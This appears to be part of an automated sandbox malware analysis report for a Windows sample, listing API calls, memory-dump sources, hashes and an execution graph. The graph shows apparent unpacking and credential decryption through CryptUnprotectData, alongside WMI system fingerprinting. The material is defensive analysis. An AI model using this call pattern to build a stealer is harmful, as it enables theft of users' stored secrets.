                                                                                                • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                • String ID:
                                                                                                • API String ID: 1964976909-0
                                                                                                • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                                                • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                                                APIs
                                                                                                • TlsAlloc.KERNEL32(?,02140D90), ref: 0214294F
                                                                                                • GetLastError.KERNEL32 ref: 0214295C
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02142972
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02142980
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3103352999-0
                                                                                                • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                • Instruction ID: d5ac51bf463864418c6da5e422f51f3bb808b6bc716a65b6c38aa26b2622f9e9
                                                                                                • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                • Instruction Fuzzy Hash: 2EE0C2301401266B8724BB759C48A7F32A86B01B15BA00A25F869E20E0EF78D0888AA8
                                                                                                APIs
                                                                                                • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                • GetLastError.KERNEL32 ref: 004126F5
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3103352999-0
                                                                                                • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: s2C$s2C
                                                                                                • API String ID: 0-1833909196
                                                                                                • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                APIs
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0215895A
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02158A13
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 3480331319-1018135373
                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction ID: e8fb9f8733dd20deb9ace301450b79664adf146a37c329cfa299e3cb75ba8556
                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction Fuzzy Hash: 8141D534A40229DFCF10DF68C844AAEBBB5BF84328F1581A5EC355B391C7369A45CF91
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0216B31B,?,00000050,?,?,?,?,?), ref: 0216B19B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction ID: e818c6b5b207ec9e2ea9f4c527d4515115dd71321d1b2eee17cb93bc803e3e00
                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction Fuzzy Hash: 0C219262B89104B6EB348F54E909BBF7396EB40B5DF568464E919F7100FB32DB21C294
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                APIs
                                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                                                • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodersGdipImage$Size
                                                                                                • String ID: image/png
                                                                                                • API String ID: 864223233-2966254431
                                                                                                • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
                                                                                                • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000000D,?,0213E09E,0213C8B6,?,?,00000000,?,0213C786,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0213C8B6), ref: 0213F207
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: y+
                                                                                                • API String ID: 1452528299-836810567
                                                                                                • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction ID: b91881e992eae0290fcb9d71f240e725cdafa888f80c15ab29f6ff4996957a68
                                                                                                • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction Fuzzy Hash: 2C11E136780226AFCF179F64EC4466AFB66FF08656B014039FA1596660CB70D912CBD0
                                                                                                APIs
                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___std_exception_destroy
                                                                                                • String ID: <(@$ios_base::failbit set
                                                                                                • API String ID: 4194217158-2207043977
                                                                                                • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                                                • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                                                APIs
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                • String ID: pContext
                                                                                                • API String ID: 1687795959-2046700901
                                                                                                • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                                                • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catch
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 3886170330-2084237596
                                                                                                • Opcode ID: c77a50944506ad57a98a4c66ce3842a5e3d4c3b4b31d3f6d7aecee6842a5070c
                                                                                                • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                                                • Opcode Fuzzy Hash: c77a50944506ad57a98a4c66ce3842a5e3d4c3b4b31d3f6d7aecee6842a5070c
                                                                                                • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                                                  • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                                                  • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                                                  • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                                                  • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                • String ID: F@
                                                                                                • API String ID: 2118720939-885931407
                                                                                                • Opcode ID: 848d6f1738542524cf130f1db85803f79a44343e81d348b6e04ecbec5e3999a8
                                                                                                • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                                                • Opcode Fuzzy Hash: 848d6f1738542524cf130f1db85803f79a44343e81d348b6e04ecbec5e3999a8
                                                                                                • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                                                APIs
                                                                                                • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
                                                                                                  • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
                                                                                                Strings
                                                                                                • Access violation - no RTTI data!, xrefs: 00428D6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                • String ID: Access violation - no RTTI data!
                                                                                                • API String ID: 2053020834-2158758863
                                                                                                • Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                • Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
                                                                                                • Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                • Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D
                                                                                                APIs
                                                                                                • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                • String ID: jB$nB
                                                                                                • API String ID: 3275300208-1818383504
                                                                                                • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                                                • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                                                APIs
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                • String ID: pThreadProxy
                                                                                                • API String ID: 1687795959-3651400591
                                                                                                • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                                                • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02132AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02132AA3,00000000), ref: 0215B177
                                                                                                • GetLastError.KERNEL32 ref: 0215B185
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02132AA3,00000000), ref: 0215B1E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                • Instruction ID: 019fa2b0f574382000c0887622f1e666a24cc7d9e5675ceb0f030ef27abd13aa
                                                                                                • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                • Instruction Fuzzy Hash: A6411930688226EFCB258F65D8847BE7BB5EF01329F1541E8EC795B194DB30AB01CB60
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                                                • GetLastError.KERNEL32 ref: 0042AF1E
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                                                • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A

                                                                                                Execution Graph

                                                                                                Execution Coverage:3%
                                                                                                Dynamic/Decrypted Code Coverage:19.3%
                                                                                                Signature Coverage:38.6%
                                                                                                Total number of Nodes:166
                                                                                                Total number of Limit Nodes:14
                                                                                                execution_graph 26160 408880 26162 40888f 26160->26162 26161 408ab5 ExitProcess 26162->26161 26163 408aa7 26162->26163 26164 4088a4 GetCurrentProcessId GetCurrentThreadId 26162->26164 26178 440240 FreeLibrary 26163->26178 26165 4088ca 26164->26165 26166 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26164->26166 26165->26166 26168 408974 26166->26168 26174 43eb20 26168->26174 26170 408a9e 26170->26163 26171 4089cf 26171->26170 26172 408a99 26171->26172 26177 40ba80 FreeLibrary FreeLibrary 26172->26177 26179 441850 26174->26179 26176 43eb2a RtlAllocateHeap 26176->26171 26177->26170 26178->26161 26180 441870 26179->26180 26180->26176 26180->26180 26216 415720 26217 415740 26216->26217 26217->26217 26255 443190 26217->26255 26219 415882 26220 4158ab 26219->26220 26224 415ad2 26219->26224 26226 415b37 26219->26226 26243 4158ea 26219->26243 26263 443440 LdrInitializeThunk 26219->26263 26220->26224 26220->26226 26220->26243 26264 4434d0 26220->26264 26224->26243 26270 4402c0 LdrInitializeThunk 26224->26270 26226->26226 26227 443190 LdrInitializeThunk 26226->26227 26228 415c8d 26227->26228 26229 415d02 26228->26229 26231 415d3e 26228->26231 26228->26243 26271 443440 LdrInitializeThunk 26228->26271 26229->26231 26232 4434d0 LdrInitializeThunk 26229->26232 26244 415dbe 26231->26244 26272 4402c0 LdrInitializeThunk 26231->26272 26232->26231 26234 416498 26235 41647e 26274 419840 FreeLibrary FreeLibrary RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 26235->26274 26237 41632f 26237->26234 26239 4163b2 26237->26239 26253 4164c2 26237->26253 26238 416087 26238->26234 26238->26235 26238->26237 26273 41bba0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 26239->26273 26240 41605d CryptUnprotectData 26240->26237 26240->26238 26241 416483 26241->26234 26252 41687e 26241->26252 26276 4402c0 LdrInitializeThunk 26241->26276 26244->26238 26244->26240 26246 41672c 26275 41bba0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 26246->26275 26248 4168b7 26251 416bd9 26248->26251 26278 4402c0 LdrInitializeThunk 26248->26278 26252->26248 26252->26251 26277 4402c0 LdrInitializeThunk 26252->26277 26253->26243 26253->26246 26259 4432f0 26253->26259 26257 4431b0 26255->26257 26256 443298 26256->26219 26257->26256 26279 4402c0 LdrInitializeThunk 26257->26279 26260 443310 26259->26260 26261 4433ee 26260->26261 26280 4402c0 LdrInitializeThunk 26260->26280 26261->26253 26263->26220 26265 4434e9 26264->26265 26266 4158db 26264->26266 26265->26266 26281 4402c0 LdrInitializeThunk 26265->26281 26266->26224 26266->26226 26266->26243 26268 443538 26268->26266 26282 4402c0 LdrInitializeThunk 26268->26282 26270->26243 26271->26229 26272->26244 26273->26243 26274->26241 26275->26243 26276->26252 26277->26248 26278->26248 26279->26256 26280->26261 26281->26268 26282->26266 26283 440260 26284 4402a5 26283->26284 26285 440286 26283->26285 26286 440278 26283->26286 26287 44029a 26283->26287 26292 43eb40 26284->26292 26290 44028b RtlReAllocateHeap 26285->26290 26286->26284 26286->26285 26288 43eb20 RtlAllocateHeap 26287->26288 26291 4402a0 26288->26291 26290->26291 26293 43eb53 26292->26293 26294 43eb55 26292->26294 26293->26291 26295 43eb5a RtlFreeHeap 26294->26295 26295->26291 26296 40cfec 26297 40d010 26296->26297 26300 43b870 26297->26300 26299 40d175 26301 43b8b0 26300->26301 26301->26301 26302 43bc86 CoCreateInstance 26301->26302 26303 43c217 26302->26303 26304 43bcda SysAllocString 26302->26304 26305 43c227 GetVolumeInformationW 26303->26305 26307 43bd6a 26304->26307 26315 43c249 26305->26315 26308 43bd72 CoSetProxyBlanket 26307->26308 26309 43c206 SysFreeString 26307->26309 26310 43bd92 SysAllocString 26308->26310 26311 43c1fc 26308->26311 26309->26303 26313 43be80 26310->26313 26311->26309 26313->26313 26314 43becf SysAllocString 26313->26314 26317 43bef2 26314->26317 26315->26299 26316 43c1e7 SysFreeString SysFreeString 26316->26311 26317->26316 26318 43c1dd 26317->26318 26319 43bf39 VariantInit 26317->26319 26318->26316 26321 43bf90 26319->26321 26320 43c1cc VariantClear 26320->26318 26321->26320 26322 4406eb 26323 44072e 26322->26323 26324 44070c 26322->26324 26324->26323 26326 4402c0 LdrInitializeThunk 26324->26326 26326->26323 26181 40ab12 26182 40ab22 26181->26182 26183 40ab3d WSAStartup 26182->26183 26184 40df92 CoInitializeSecurity 26327 421370 26328 4213d8 26327->26328 26329 42137e 26327->26329 26333 421490 26329->26333 26334 4214a0 26333->26334 26334->26334 26335 4432f0 LdrInitializeThunk 26334->26335 26336 42157f 26335->26336 26185 40e3d3 CoInitializeEx CoInitializeEx 26337 760005 26342 76092b GetPEB 26337->26342 26339 760030 26343 76003c 26339->26343 26342->26339 26344 760049 26343->26344 26358 760e0f SetErrorMode SetErrorMode 26344->26358 26349 760265 26350 7602ce VirtualProtect 26349->26350 26352 76030b 26350->26352 26351 760439 VirtualFree 26355 7604be 26351->26355 26356 7605f4 LoadLibraryA 26351->26356 26352->26351 26353 7604e3 LoadLibraryA 26353->26355 26355->26353 26355->26356 26357 7608c7 26356->26357 26359 760223 26358->26359 26360 760d90 26359->26360 26361 760dad 26360->26361 26362 760dbb GetPEB 26361->26362 26363 760238 VirtualAlloc 26361->26363 26362->26363 26363->26349 26186 442390 26188 4423b0 26186->26188 26187 442439 26188->26187 26190 4402c0 LdrInitializeThunk 26188->26190 26190->26187 26191 540000 26194 540006 26191->26194 26195 540015 26194->26195 26198 5407a6 26195->26198 26203 5407c1 26198->26203 26199 5407ca CreateToolhelp32Snapshot 26200 5407e6 Module32First 26199->26200 26199->26203 26201 5407f5 26200->26201 26202 540005 26200->26202 26205 540465 26201->26205 26203->26199 26203->26200 26206 540490 26205->26206 26207 5404a1 VirtualAlloc 26206->26207 26208 5404d9 26206->26208 26207->26208 26364 4404b1 GetForegroundWindow 26365 4404ce 26364->26365 26209 440cde 26210 440ce8 26209->26210 26212 440dae 26210->26212 26215 4402c0 LdrInitializeThunk 26210->26215 26214 4402c0 LdrInitializeThunk 26212->26214 26214->26212 26215->26212 26371 4409b8 26373 4409d0 26371->26373 26372 440a8e 26374 440a3e 26373->26374 26377 4402c0 LdrInitializeThunk 26373->26377 26374->26372 26378 4402c0 LdrInitializeThunk 26374->26378 26377->26374 26378->26372

                                                                                                Control-flow Graph

